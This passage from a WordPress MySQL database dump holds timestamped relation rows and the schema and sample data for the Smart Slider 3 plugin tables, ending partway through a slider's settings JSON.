(917, 4501, 41, '2018-11-15 06:57:26'),
(918, 4500, 41, '2018-11-15 06:57:26'),
(919, 4498, 41, '2018-11-15 06:57:26'),
(920, 4497, 41, '2018-11-15 06:57:26'),
(921, 4496, 41, '2018-11-15 06:57:26'),
(922, 4495, 41, '2018-11-15 06:57:26'),
(923, 4494, 41, '2018-11-15 06:57:26'),
(924, 4509, 41, '2018-11-15 06:57:36'),
(925, 4510, 41, '2018-11-15 06:57:36'),
(926, 4508, 41, '2018-11-15 06:57:36'),
(927, 4507, 41, '2018-11-15 06:57:36'),
(928, 4506, 41, '2018-11-15 06:57:36'),
(944, 4559, 42, '2018-11-16 02:14:07'),
(951, 4569, 42, '2018-11-16 02:14:46'),
(952, 4576, 42, '2018-11-16 02:14:46'),
(953, 4575, 42, '2018-11-16 02:14:46'),
(954, 4574, 42, '2018-11-16 02:14:46'),
(955, 4573, 42, '2018-11-16 02:14:46'),
(956, 4572, 42, '2018-11-16 02:14:46'),
(957, 4571, 42, '2018-11-16 02:14:46'),
(958, 4570, 42, '2018-11-16 02:14:46'),
(959, 4568, 42, '2018-11-16 02:14:46'),
(960, 4567, 42, '2018-11-16 02:14:46'),
(961, 4566, 42, '2018-11-16 02:14:46'),
(962, 4565, 42, '2018-11-16 02:14:46'),
(963, 4564, 42, '2018-11-16 02:14:46'),
(964, 4563, 42, '2018-11-16 02:14:46'),
(965, 4562, 42, '2018-11-16 02:14:46'),
(966, 4561, 42, '2018-11-16 02:14:46'),
(967, 4560, 42, '2018-11-16 02:14:46'),
(968, 4558, 42, '2018-11-16 02:14:46'),
(969, 4581, 42, '2018-11-16 02:15:02'),
(970, 4589, 42, '2018-11-16 02:15:02'),
(971, 4587, 42, '2018-11-16 02:15:02'),
(972, 4586, 42, '2018-11-16 02:15:02'),
(973, 4585, 42, '2018-11-16 02:15:02'),
(974, 4584, 42, '2018-11-16 02:15:02'),
(975, 4583, 42, '2018-11-16 02:15:02'),
(976, 4582, 42, '2018-11-16 02:15:02'),
(977, 4580, 42, '2018-11-16 02:15:02'),
(978, 4579, 42, '2018-11-16 02:15:02'),
(979, 4578, 42, '2018-11-16 02:15:02'),
(980, 4577, 42, '2018-11-16 02:15:02'),
(1002, 4538, 43, '2018-11-16 07:09:35'),
(1003, 4545, 43, '2018-11-16 07:09:35'),
(1004, 4544, 43, '2018-11-16 07:09:35'),
(1005, 4543, 43, '2018-11-16 07:09:35'),
(1006, 4542, 43, '2018-11-16 07:09:35'),
(1007, 4541, 43, '2018-11-16 07:09:35'),
(1008, 4540, 43, '2018-11-16 07:09:36'),
(1009, 4539, 43, '2018-11-16 07:09:36'),
(1010, 4537, 43, '2018-11-16 07:09:36'),
(1011, 4536, 43, '2018-11-16 07:09:36'),
(1012, 4549, 43, '2018-11-16 07:09:56'),
(1013, 4556, 43, '2018-11-16 07:09:56'),
(1014, 4555, 43, '2018-11-16 07:09:56'),
(1015, 4554, 43, '2018-11-16 07:09:56'),
(1016, 4553, 43, '2018-11-16 07:09:56'),
(1017, 4552, 43, '2018-11-16 07:09:56'),
(1018, 4551, 43, '2018-11-16 07:09:56'),
(1019, 4550, 43, '2018-11-16 07:09:56'),
(1020, 4548, 43, '2018-11-16 07:09:56'),
(1021, 4547, 43, '2018-11-16 07:09:56'),
(1022, 4546, 43, '2018-11-16 07:09:56'),
(1047, 4839, 44, '2018-12-26 02:14:10'),
(1048, 4779, 44, '2018-12-26 02:14:10'),
(1049, 4755, 44, '2018-12-26 02:14:10'),
(1050, 4680, 44, '2018-12-26 02:14:10'),
(1051, 4813, 45, '2018-12-26 02:15:29'),
(1052, 4804, 45, '2018-12-26 02:15:29'),
(1053, 4801, 45, '2018-12-26 02:15:29'),
(1054, 4793, 45, '2018-12-26 02:15:29'),
(1055, 4790, 45, '2018-12-26 02:15:29'),
(1056, 4769, 45, '2018-12-26 02:15:29'),
(1057, 4693, 45, '2018-12-26 02:15:29'),
(1058, 4683, 45, '2018-12-26 02:15:29'),
(1059, 4676, 45, '2018-12-26 02:15:29'),
(1060, 4673, 45, '2018-12-26 02:15:29'),
(1061, 4835, 46, '2018-12-26 02:21:50'),
(1062, 4827, 46, '2018-12-26 02:21:50'),
(1063, 4669, 46, '2018-12-26 02:21:50'),
(1064, 4787, 49, '2018-12-26 02:22:09'),
(1083, 4214, 3, '2018-12-26 02:23:08'),
(1085, 4796, 50, '2018-12-26 02:24:09'),
(1086, 4774, 50, '2018-12-26 02:24:09'),
(1087, 4773, 50, '2018-12-26 02:24:09'),
(1088, 4784, 45, '2018-12-26 02:24:45'),
(1089, 4782, 45, '2018-12-26 02:24:45'),
(1090, 4660, 45, '2018-12-26 02:24:45'),
(1091, 4642, 45, '2018-12-26 02:24:46'),
(1092, 4625, 45, '2018-12-26 02:24:46'),
(1093, 4624, 45, '2018-12-26 02:24:46'),
(1094, 4623, 45, '2018-12-26 02:24:46'),
(1095, 4622, 45, '2018-12-26 02:24:46'),
(1096, 4416, 45, '2018-12-26 02:24:46'),
(1097, 4666, 44, '2018-12-26 02:25:04'),
(1098, 4516, 44, '2018-12-26 02:25:04'),
(1099, 4354, 44, '2018-12-26 02:25:04'),
(1100, 4244, 44, '2018-12-26 02:25:04'),
(1101, 4663, 49, '2018-12-26 02:25:11'),
(1102, 4652, 46, '2018-12-26 02:25:19'),
(1103, 4302, 51, '2018-12-26 02:25:42'),
(1104, 4270, 44, '2018-12-26 02:25:48'),
(1105, 4237, 46, '2018-12-26 02:27:54'),
(1106, 4236, 46, '2018-12-26 02:27:54'),
(1107, 4235, 46, '2018-12-26 02:27:54'),
(1108, 4241, 44, '2018-12-26 02:28:25'),
(1109, 4188, 44, '2018-12-26 02:28:25'),
(1110, 1987, 44, '2018-12-26 02:28:25'),
(1111, 1732, 44, '2018-12-26 02:28:25'),
(1112, 1738, 50, '2018-12-26 02:28:45'),
(1113, 1735, 50, '2018-12-26 02:28:45'),
(1114, 1734, 50, '2018-12-26 02:28:45'),
(1115, 1713, 50, '2018-12-26 02:28:45'),
(1116, 1712, 50, '2018-12-26 02:28:45'),
(1117, 1711, 50, '2018-12-26 02:28:45'),
(1118, 1990, 45, '2018-12-26 02:29:19'),
(1119, 1728, 45, '2018-12-26 02:29:19'),
(1120, 1736, 50, '2018-12-26 02:29:25'),
(1121, 1723, 46, '2018-12-26 02:29:33'),
(1122, 1697, 50, '2018-12-26 02:31:30'),
(1123, 1696, 50, '2018-12-26 02:31:30'),
(1124, 1695, 50, '2018-12-26 02:31:30'),
(1125, 1691, 50, '2018-12-26 02:31:30'),
(1126, 1690, 50, '2018-12-26 02:31:30'),
(1127, 1689, 50, '2018-12-26 02:31:30'),
(1128, 1683, 50, '2018-12-26 02:31:30'),
(1129, 1682, 50, '2018-12-26 02:31:30'),
(1130, 1681, 50, '2018-12-26 02:31:30'),
(1131, 1680, 50, '2018-12-26 02:31:30'),
(1132, 1679, 50, '2018-12-26 02:31:30'),
(1133, 1678, 50, '2018-12-26 02:31:30'),
(1134, 1677, 50, '2018-12-26 02:31:30'),
(1135, 1671, 50, '2018-12-26 02:31:30'),
(1136, 4185, 3, '2018-12-26 02:39:43'),
(1137, 4180, 3, '2018-12-26 02:39:43'),
(1138, 4177, 3, '2018-12-26 02:39:43'),
(1139, 4173, 3, '2018-12-26 02:39:43'),
(1140, 4170, 3, '2018-12-26 02:39:43'),
(1141, 4105, 3, '2018-12-26 02:39:43'),
(1142, 4080, 3, '2018-12-26 02:39:43'),
(1143, 4064, 3, '2018-12-26 02:39:43'),
(1144, 4061, 3, '2018-12-26 02:39:43'),
(1145, 4058, 3, '2018-12-26 02:39:43'),
(1146, 4055, 3, '2018-12-26 02:39:43'),
(1147, 4021, 3, '2018-12-26 02:39:43'),
(1148, 4007, 3, '2018-12-26 02:39:43'),
(1149, 3923, 3, '2018-12-26 02:39:43'),
(1150, 3897, 3, '2018-12-26 02:39:44'),
(1151, 3890, 3, '2018-12-26 02:39:44'),
(1152, 3875, 3, '2018-12-26 02:39:44'),
(1153, 3713, 3, '2018-12-26 02:39:44'),
(1154, 3712, 3, '2018-12-26 02:39:44'),
(1155, 3711, 3, '2018-12-26 02:39:44'),
(1156, 3536, 3, '2018-12-26 02:40:00'),
(1157, 3529, 3, '2018-12-26 02:40:00'),
(1158, 3519, 3, '2018-12-26 02:40:00'),
(1159, 3470, 3, '2018-12-26 02:40:00'),
(1160, 3431, 3, '2018-12-26 02:40:00'),
(1161, 3281, 3, '2018-12-26 02:40:00'),
(1162, 3269, 3, '2018-12-26 02:40:00'),
(1163, 3265, 3, '2018-12-26 02:40:00'),
(1164, 3255, 3, '2018-12-26 02:40:00'),
(1165, 3185, 3, '2018-12-26 02:40:00'),
(1166, 3177, 3, '2018-12-26 02:40:00'),
(1167, 3123, 3, '2018-12-26 02:40:00'),
(1168, 3122, 3, '2018-12-26 02:40:00'),
(1169, 3112, 3, '2018-12-26 02:40:00'),
(1170, 3055, 3, '2018-12-26 02:40:00'),
(1171, 3051, 3, '2018-12-26 02:40:00'),
(1172, 3050, 3, '2018-12-26 02:40:00'),
(1173, 3049, 3, '2018-12-26 02:40:00'),
(1174, 3048, 3, '2018-12-26 02:40:00'),
(1175, 3043, 3, '2018-12-26 02:40:00'),
(1176, 3042, 3, '2018-12-26 02:40:29'),
(1177, 3041, 3, '2018-12-26 02:40:29'),
(1178, 3040, 3, '2018-12-26 02:40:29'),
(1179, 3039, 3, '2018-12-26 02:40:29'),
(1180, 3038, 3, '2018-12-26 02:40:29'),
(1181, 3037, 3, '2018-12-26 02:40:29'),
(1182, 3036, 3, '2018-12-26 02:40:29'),
(1183, 3035, 3, '2018-12-26 02:40:29'),
(1184, 3030, 3, '2018-12-26 02:40:29'),
(1185, 2964, 3, '2018-12-26 02:40:29'),
(1186, 2963, 3, '2018-12-26 02:40:29'),
(1187, 2946, 3, '2018-12-26 02:40:29'),
(1188, 2941, 3, '2018-12-26 02:40:29'),
(1189, 2938, 3, '2018-12-26 02:40:29'),
(1190, 2929, 3, '2018-12-26 02:40:29'),
(1191, 2928, 3, '2018-12-26 02:40:29'),
(1192, 2919, 3, '2018-12-26 02:40:29'),
(1193, 2918, 3, '2018-12-26 02:40:29'),
(1194, 2917, 3, '2018-12-26 02:40:29'),
(1195, 2905, 3, '2018-12-26 02:40:29'),
(1196, 2904, 3, '2018-12-26 02:40:46'),
(1197, 2903, 3, '2018-12-26 02:40:46'),
(1198, 2884, 3, '2018-12-26 02:40:46'),
(1199, 2879, 3, '2018-12-26 02:40:46'),
(1200, 2878, 3, '2018-12-26 02:40:46'),
(1201, 2877, 3, '2018-12-26 02:40:47'),
(1202, 2876, 3, '2018-12-26 02:40:47'),
(1203, 2875, 3, '2018-12-26 02:40:47'),
(1204, 2874, 3, '2018-12-26 02:40:47'),
(1205, 2873, 3, '2018-12-26 02:40:47'),
(1206, 2872, 3, '2018-12-26 02:40:47'),
(1207, 2859, 3, '2018-12-26 02:40:47'),
(1208, 2858, 3, '2018-12-26 02:40:47'),
(1209, 2843, 3, '2018-12-26 02:40:47'),
(1210, 2842, 3, '2018-12-26 02:40:47'),
(1211, 2837, 3, '2018-12-26 02:40:47'),
(1212, 2640, 3, '2018-12-26 02:40:47'),
(1213, 2637, 3, '2018-12-26 02:40:47'),
(1214, 2624, 3, '2018-12-26 02:40:47'),
(1215, 2617, 3, '2018-12-26 02:40:47'),
(1216, 2616, 3, '2018-12-26 02:41:05'),
(1217, 2611, 3, '2018-12-26 02:41:05'),
(1218, 2608, 3, '2018-12-26 02:41:05'),
(1219, 2472, 3, '2018-12-26 02:41:05'),
(1220, 2471, 3, '2018-12-26 02:41:05'),
(1221, 2458, 3, '2018-12-26 02:41:05'),
(1222, 2457, 3, '2018-12-26 02:41:05'),
(1223, 2456, 3, '2018-12-26 02:41:05'),
(1224, 2455, 3, '2018-12-26 02:41:05'),
(1225, 2454, 3, '2018-12-26 02:41:05'),
(1226, 2453, 3, '2018-12-26 02:41:05'),
(1227, 2452, 3, '2018-12-26 02:41:05'),
(1228, 2451, 3, '2018-12-26 02:41:05'),
(1229, 2450, 3, '2018-12-26 02:41:05'),
(1230, 2449, 3, '2018-12-26 02:41:05'),
(1231, 2448, 3, '2018-12-26 02:41:05'),
(1232, 2447, 3, '2018-12-26 02:41:05'),
(1233, 2442, 3, '2018-12-26 02:41:05'),
(1234, 2428, 3, '2018-12-26 02:41:05'),
(1235, 2427, 3, '2018-12-26 02:41:05'),
(1236, 1833, 18, '2019-01-10 02:04:54'),
(1237, 1834, 18, '2019-01-10 02:04:54'),
(1238, 5002, 2, '2019-01-10 02:06:16'),
(1239, 5003, 2, '2019-01-10 02:06:16'),
(1240, 4999, 2, '2019-01-10 02:06:16'),
(1241, 4995, 2, '2019-01-10 02:06:16'),
(1242, 4992, 2, '2019-01-10 02:06:16'),
(1243, 4989, 2, '2019-01-10 02:06:16'),
(1244, 4976, 2, '2019-01-10 02:06:16'),
(1245, 4974, 2, '2019-01-10 02:06:16'),
(1246, 4972, 2, '2019-01-10 02:06:16'),
(1247, 4969, 2, '2019-01-10 02:06:16'),
(1248, 4968, 2, '2019-01-10 02:06:16'),
(1249, 4965, 2, '2019-01-10 02:06:16'),
(1250, 4962, 2, '2019-01-10 02:06:16'),
(1251, 4959, 2, '2019-01-10 02:06:16'),
(1252, 4956, 2, '2019-01-10 02:06:16'),
(1253, 4953, 2, '2019-01-10 02:06:16'),
(1254, 4952, 2, '2019-01-10 02:06:16'),
(1255, 4946, 2, '2019-01-10 02:06:16'),
(1256, 4943, 2, '2019-01-10 02:06:16'),
(1257, 4939, 2, '2019-01-10 02:06:16'),
(1258, 4935, 2, '2019-01-10 02:06:16'),
(1259, 4908, 2, '2019-01-10 02:06:16'),
(1260, 4900, 2, '2019-01-10 02:06:16'),
(1261, 4897, 2, '2019-01-10 02:06:16'),
(1262, 4888, 2, '2019-01-10 02:06:16'),
(1263, 4885, 2, '2019-01-10 02:06:16'),
(1264, 4882, 2, '2019-01-10 02:06:16'),
(1265, 4879, 2, '2019-01-10 02:06:16'),
(1266, 4873, 2, '2019-01-10 02:06:16'),
(1267, 4870, 2, '2019-01-10 02:06:16'),
(1268, 4867, 2, '2019-01-10 02:07:02'),
(1269, 4864, 2, '2019-01-10 02:07:02'),
(1270, 4824, 2, '2019-01-10 02:07:02'),
(1271, 4821, 2, '2019-01-10 02:07:02'),
(1272, 4816, 2, '2019-01-10 02:07:02'),
(1273, 4815, 2, '2019-01-10 02:07:02'),
(1274, 4810, 2, '2019-01-10 02:07:02'),
(1275, 4809, 2, '2019-01-10 02:07:02'),
(1276, 4766, 2, '2019-01-10 02:07:02'),
(1277, 4763, 2, '2019-01-10 02:07:02'),
(1278, 4752, 2, '2019-01-10 02:07:02'),
(1279, 4748, 2, '2019-01-10 02:07:02'),
(1280, 4747, 2, '2019-01-10 02:07:02'),
(1281, 4744, 2, '2019-01-10 02:07:02'),
(1282, 4743, 2, '2019-01-10 02:07:02'),
(1283, 4740, 2, '2019-01-10 02:07:02'),
(1284, 4737, 2, '2019-01-10 02:07:02'),
(1285, 4736, 2, '2019-01-10 02:07:02'),
(1286, 4733, 2, '2019-01-10 02:07:02'),
(1287, 4728, 2, '2019-01-10 02:07:02'),
(1288, 4727, 2, '2019-01-10 02:07:02'),
(1289, 4723, 2, '2019-01-10 02:07:02'),
(1290, 4720, 2, '2019-01-10 02:07:02'),
(1291, 4719, 2, '2019-01-10 02:07:02'),
(1292, 4820, 2, '2019-01-10 02:07:41'),
(1293, 4716, 2, '2019-01-10 02:07:41'),
(1294, 4713, 2, '2019-01-10 02:07:41'),
(1295, 4712, 2, '2019-01-10 02:07:41'),
(1296, 4709, 2, '2019-01-10 02:07:41'),
(1297, 4705, 2, '2019-01-10 02:07:41'),
(1298, 4702, 2, '2019-01-10 02:07:41'),
(1299, 4699, 2, '2019-01-10 02:07:41'),
(1300, 4696, 2, '2019-01-10 02:07:41'),
(1301, 4690, 2, '2019-01-10 02:07:41'),
(1302, 4688, 2, '2019-01-10 02:07:41'),
(1303, 4647, 2, '2019-01-10 02:07:41'),
(1304, 4645, 2, '2019-01-10 02:07:41'),
(1305, 4639, 2, '2019-01-10 02:07:41'),
(1306, 4636, 2, '2019-01-10 02:07:41'),
(1307, 4633, 2, '2019-01-10 02:07:41'),
(1308, 4630, 2, '2019-01-10 02:07:41'),
(1309, 4617, 2, '2019-01-10 02:07:41'),
(1310, 4612, 2, '2019-01-10 02:07:41'),
(1311, 4611, 2, '2019-01-10 02:07:41'),
(1312, 4609, 2, '2019-01-10 02:07:41'),
(1313, 4607, 2, '2019-01-10 02:07:41'),
(1314, 4604, 2, '2019-01-10 02:07:41'),
(1315, 4601, 2, '2019-01-10 02:07:41'),
(1316, 4431, 2, '2019-01-10 02:07:41'),
(1317, 4427, 2, '2019-01-10 02:09:18'),
(1318, 4425, 2, '2019-01-10 02:09:18'),
(1319, 4309, 2, '2019-01-10 02:09:18'),
(1320, 4306, 2, '2019-01-10 02:09:18'),
(1321, 4305, 2, '2019-01-10 02:09:18'),
(1322, 4297, 2, '2019-01-10 02:09:18'),
(1323, 4296, 2, '2019-01-10 02:09:18'),
(1324, 4295, 2, '2019-01-10 02:09:18'),
(1325, 4294, 2, '2019-01-10 02:09:18'),
(1326, 4293, 2, '2019-01-10 02:09:18'),
(1327, 4288, 2, '2019-01-10 02:09:18'),
(1328, 4285, 2, '2019-01-10 02:09:18'),
(1329, 4282, 2, '2019-01-10 02:09:18'),
(1330, 4277, 2, '2019-01-10 02:09:18'),
(1331, 4275, 2, '2019-01-10 02:09:18'),
(1332, 4266, 2, '2019-01-10 02:09:18'),
(1333, 4206, 2, '2019-01-10 02:09:18'),
(1334, 4203, 2, '2019-01-10 02:09:18'),
(1335, 4200, 2, '2019-01-10 02:09:18'),
(1336, 4194, 2, '2019-01-10 02:09:18'),
(1337, 4190, 2, '2019-01-10 02:09:18'),
(1338, 4183, 2, '2019-01-10 02:09:18'),
(1339, 4167, 2, '2019-01-10 02:09:18'),
(1340, 4164, 2, '2019-01-10 02:09:18'),
(1341, 4161, 2, '2019-01-10 02:09:18'),
(1342, 4158, 2, '2019-01-10 02:09:44'),
(1343, 4155, 2, '2019-01-10 02:09:44'),
(1344, 4152, 2, '2019-01-10 02:09:44'),
(1345, 4151, 2, '2019-01-10 02:09:44'),
(1346, 4130, 2, '2019-01-10 02:09:45'),
(1347, 4126, 2, '2019-01-10 02:09:45'),
(1348, 4125, 2, '2019-01-10 02:09:45'),
(1349, 4124, 2, '2019-01-10 02:09:45'),
(1350, 4122, 2, '2019-01-10 02:09:45'),
(1351, 4120, 2, '2019-01-10 02:09:45'),
(1352, 4118, 2, '2019-01-10 02:09:45'),
(1353, 4117, 2, '2019-01-10 02:09:45'),
(1354, 4113, 2, '2019-01-10 02:09:45'),
(1355, 4112, 2, '2019-01-10 02:09:45'),
(1356, 4111, 2, '2019-01-10 02:09:45'),
(1357, 4108, 2, '2019-01-10 02:09:45'),
(1358, 4102, 2, '2019-01-10 02:09:45'),
(1359, 4099, 2, '2019-01-10 02:09:45'),
(1360, 4086, 2, '2019-01-10 02:09:45'),
(1361, 4077, 2, '2019-01-10 02:09:45'),
(1362, 4074, 2, '2019-01-10 02:09:45'),
(1363, 4071, 2, '2019-01-10 02:09:45'),
(1364, 4067, 2, '2019-01-10 02:09:45'),
(1365, 4027, 2, '2019-01-10 02:10:10'),
(1366, 4050, 2, '2019-01-10 02:10:10'),
(1367, 4049, 2, '2019-01-10 02:10:10'),
(1368, 4043, 2, '2019-01-10 02:10:10'),
(1369, 4042, 2, '2019-01-10 02:10:10'),
(1370, 4034, 2, '2019-01-10 02:10:10'),
(1371, 4030, 2, '2019-01-10 02:10:10'),
(1372, 4024, 2, '2019-01-10 02:10:10'),
(1373, 4018, 2, '2019-01-10 02:10:10'),
(1374, 4015, 2, '2019-01-10 02:10:11'),
(1375, 4014, 2, '2019-01-10 02:10:11'),
(1376, 4011, 2, '2019-01-10 02:10:11'),
(1377, 3994, 2, '2019-01-10 02:10:11'),
(1378, 3990, 2, '2019-01-10 02:10:11'),
(1379, 3989, 2, '2019-01-10 02:10:11'),
(1380, 3986, 2, '2019-01-10 02:10:11'),
(1381, 3983, 2, '2019-01-10 02:10:11'),
(1382, 3980, 2, '2019-01-10 02:10:11'),
(1383, 3977, 2, '2019-01-10 02:10:11'),
(1384, 3976, 2, '2019-01-10 02:10:11'),
(1385, 3973, 2, '2019-01-10 02:10:11'),
(1386, 3972, 2, '2019-01-10 02:10:11'),
(1387, 3969, 2, '2019-01-10 02:10:11'),
(1388, 3963, 2, '2019-01-10 02:10:45'),
(1389, 3966, 2, '2019-01-10 02:10:45'),
(1390, 3962, 2, '2019-01-10 02:10:45'),
(1391, 3959, 2, '2019-01-10 02:10:45'),
(1392, 3956, 2, '2019-01-10 02:10:45'),
(1393, 3955, 2, '2019-01-10 02:10:45'),
(1394, 3947, 2, '2019-01-10 02:10:45'),
(1395, 3945, 2, '2019-01-10 02:10:45'),
(1396, 3939, 2, '2019-01-10 02:10:45'),
(1397, 3936, 2, '2019-01-10 02:10:45'),
(1398, 3934, 2, '2019-01-10 02:10:45'),
(1399, 3933, 2, '2019-01-10 02:10:45'),
(1400, 3932, 2, '2019-01-10 02:10:45'),
(1401, 3926, 2, '2019-01-10 02:10:45'),
(1402, 3918, 2, '2019-01-10 02:10:45'),
(1403, 3915, 2, '2019-01-10 02:10:45'),
(1404, 3913, 2, '2019-01-10 02:10:45'),
(1405, 3909, 2, '2019-01-10 02:10:45'),
(1406, 3907, 2, '2019-01-10 02:10:45'),
(1407, 3894, 2, '2019-01-10 02:10:45'),
(1408, 3886, 2, '2019-01-10 02:10:45'),
(1409, 3883, 2, '2019-01-10 02:10:45'),
(1410, 3880, 2, '2019-01-10 02:10:45'),
(1411, 10989, 52, '2020-12-23 03:47:36'),
(1412, 10990, 52, '2020-12-23 03:48:48'),
(1413, 10991, 52, '2020-12-23 03:49:14'),
(1414, 10992, 52, '2020-12-23 03:49:49'),
(1415, 10993, 52, '2020-12-23 03:50:15'),
(1416, 10994, 52, '2020-12-23 03:50:47'),
(1417, 10995, 52, '2020-12-23 03:51:25'),
(1418, 10996, 52, '2020-12-23 03:52:12'),
(1419, 10997, 52, '2020-12-23 03:52:33'),
(1420, 10998, 52, '2020-12-23 03:52:52'),
(1421, 10999, 52, '2020-12-23 03:53:14'),
(1422, 11000, 52, '2020-12-23 03:53:32'),
(1423, 11001, 52, '2020-12-23 06:10:56'),
(1424, 11002, 52, '2020-12-23 06:11:23'),
(1425, 11003, 52, '2020-12-23 06:11:47'),
(1426, 11004, 52, '2020-12-23 06:12:13'),
(1427, 11005, 52, '2020-12-23 06:12:46'),
(1428, 11006, 52, '2020-12-23 06:13:03'),
(1429, 11007, 52, '2020-12-23 06:13:57'),
(1430, 11008, 52, '2020-12-23 06:14:22'),
(1431, 11009, 52, '2020-12-23 06:14:42'),
(1432, 11010, 52, '2020-12-23 06:15:07'),
(1433, 11011, 52, '2020-12-23 06:15:37'),
(1434, 11012, 52, '2020-12-23 06:15:55'),
(1435, 11013, 52, '2020-12-23 06:16:14'),
(1436, 11014, 52, '2020-12-23 06:16:35'),
(1437, 11015, 52, '2020-12-23 06:17:01'),
(1438, 11016, 52, '2020-12-23 06:17:23'),
(1439, 11017, 52, '2020-12-23 06:17:49'),
(1440, 11018, 52, '2020-12-23 06:18:24'),
(1441, 11019, 52, '2020-12-23 06:19:05');
-- --------------------------------------------------------
--
-- Table structure for table `wp_nextend2_image_storage`
--
CREATE TABLE `wp_nextend2_image_storage` (
`id` int(11) NOT NULL,
`hash` varchar(32) NOT NULL,
`image` text NOT NULL,
`value` mediumtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_nextend2_section_storage`
--
CREATE TABLE `wp_nextend2_section_storage` (
`id` int(11) NOT NULL,
`application` varchar(20) NOT NULL,
`section` varchar(128) NOT NULL,
`referencekey` varchar(128) NOT NULL,
`value` mediumtext NOT NULL,
`system` int(11) NOT NULL DEFAULT 0,
`editable` int(11) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
--
-- Dumping data for table `wp_nextend2_section_storage`
--
INSERT INTO `wp_nextend2_section_storage` (`id`, `application`, `section`, `referencekey`, `value`, `system`, `editable`) VALUES
(10000, 'system', 'global', 'n2_ss3_version', '3.2.12', 1, 1),
(10001, 'smartslider', 'sliderChanged', '2', '1', 0, 1);
-- --------------------------------------------------------
--
-- Table structure for table `wp_nextend2_smartslider3_generators`
--
CREATE TABLE `wp_nextend2_smartslider3_generators` (
`id` int(11) NOT NULL,
`group` varchar(254) NOT NULL,
`type` varchar(254) NOT NULL,
`params` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_nextend2_smartslider3_sliders`
--
CREATE TABLE `wp_nextend2_smartslider3_sliders` (
`id` int(11) NOT NULL,
`title` varchar(100) NOT NULL,
`type` varchar(30) NOT NULL,
`params` mediumtext NOT NULL,
`time` datetime NOT NULL,
`thumbnail` varchar(255) NOT NULL,
`ordering` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
--
-- Dumping data for table `wp_nextend2_smartslider3_sliders`
--
INSERT INTO `wp_nextend2_smartslider3_sliders` (`id`, `title`, `type`, `params`, `time`, `thumbnail`, `ordering`) VALUES
(1, 'Sample Slider', 'simple', '{\"controlsScroll\":\"0\",\"controlsDrag\":\"1\",\"controlsTouch\":\"horizontal\",\"controlsKeyboard\":\"1\",\"controlsTilt\":\"0\",\"thumbnail\":\"\",\"align\":\"normal\",\"backgroundMode\":\"fill\",\"animation\":\"horizontal\",\"animation-duration\":\"600\",\"animation-delay\":\"0\",\"animation-easing\":\"easeOutQuad\",\"animation-parallax\":\"1\",\"background-animation\":\"\",\"background-animation-speed\":\"normal\",\"animation-shifted-background-animation\":\"auto\",\"kenburns-animation\":\"50|*|50|*|\",\"kenburns-animation-speed\":\"default\",\"kenburns-animation-strength\":\"default\",\"carousel\":\"1\",\"background\":\"\",\"background-fixed\":\"0\",\"background-size\":\"cover\",\"backgroundVideoMp4\":\"\",\"backgroundVideoMuted\":\"1\",\"backgroundVideoLoop\":\"1\",\"backgroundVideoMode\":\"fill\",\"dynamic-height\":\"0\",\"loop-single-slide\":\"0\",\"padding\":\"0|*|0|*|0|*|0\",\"border-width\":\"0\",\"border-color\":\"3E3E3Eff\",\"border-radius\":\"0\",\"slider-preset\":\"\",\"slider-css\":\"\",\"slide-css\":\"\",\"width\":\"1200\",\"height\":\"600\",\"desktop-portrait-minimum-font-size\":\"1\",\"desktop-landscape\":\"0\",\"desktop-landscape-width\":\"1440\",\"desktop-landscape-height\":\"0\",\"desktop-landscape-minimum-font-size\":\"1\",\"fontsize\":\"16\",\"desktop\":\"1\",\"tablet\":\"1\",\"mobile\":\"1\",\"margin\":\"0|*|0|*|0|*|0\",\"tablet-portrait\":\"0\",\"tablet-portrait-width\":\"800\",\"tablet-portrait-height\":\"0\",\"tablet-portrait-minimum-font-size\":\"1\",\"tablet-landscape\":\"0\",\"tablet-landscape-width\":\"1024\",\"tablet-landscape-height\":\"0\",\"tablet-landscape-minimum-font-size\":\"1\",\"mobile-portrait\":\"0\",\"mobile-portrait-width\":\"440\",\"mobile-portrait-height\":\"0\",\"mobile-portrait-minimum-font-size\":\"1\",\"mobile-landscape\":\"0\",\"mobile-landscape-width\":\"740\",\"mobile-landscape-height\":\"0\",\"mobile-landscape-minimum-font-size\":\"1\",\"responsive-mode\":\"auto\",\"responsiveScaleDown\":\"1\",\"responsiveScaleUp\":\"1\",\"responsiveSliderHeightMin\":\"0\",\"responsiveSliderHeightMax\":\"3000\",\"responsiveSlideWidthMax\":\"3000\",\"autoplay\":\"1\",\"autoplayDuration\":\"8000\",\"autoplayStart\":\"1\",\"autoplayfinish\":\"0|*|loop|*|current\",\"autoplayAllowReStart\":\"0\",\"autoplayStopClick\":\"1\",\"autoplayStopMouse\":\"0\",\"autoplayStopMedia\":\"1\",\"autoplayResumeClick\":\"0\",\"autoplayResumeMouse\":\"0\",\"autoplayResumeMedia\":\"1\",\"playfirstlayer\":\"1\",\"playonce\":\"0\",\"layer-animation-play-in\":\"end\",\"layer-animation-play-mode\":\"skippable\",\"parallax-enabled\":\"1\",\"parallax-enabled-mobile\":\"0\",\"parallax-3d\":\"0\",\"parallax-animate\":\"1\",\"parallax-horizontal\":\"mouse\",\"parallax-vertical\":\"mouse\",\"parallax-mouse-origin\":\"slider\",\"parallax-scroll-move\":\"both\",\"perspective\":\"1000\",\"imageload\":\"0\",\"imageloadNeighborSlides\":\"0\",\"optimize\":\"0\",\"optimize-quality\":\"70\",\"optimize-background-image-custom\":\"0\",\"optimize-background-image-width\":\"800\",\"optimize-background-image-height\":\"600\",\"optimizeThumbnailWidth\":\"100\",\"optimizeThumbnailHeight\":\"60\",\"layer-image-optimize\":\"0\",\"layer-image-tablet\":\"50\",\"layer-image-mobile\":\"30\",\"layer-image-base64\":\"0\",\"layer-image-base64-size\":\"5\",\"playWhenVisible\":\"1\",\"fadeOnLoad\":\"1\",\"fadeOnScroll\":\"0\",\"spinner\":\"simpleWhite\",\"custom-spinner\":\"\",\"custom-spinner-width\":\"100\",\"custom-spinner-height\":\"100\",\"custom-display\":\"1\",\"dependency\":\"\",\"delay\":\"0\",\"is-delayed\":\"0\",\"randomize\":\"0\",\"randomizeFirst\":\"0\",\"randomize-cache\":\"1\",\"variations\":\"5\",\"maximumslidecount\":\"1000\",\"global-lightbox\":\"0\",\"global-lightbox-label\":\"0\",\"maintain-session\":\"0\",\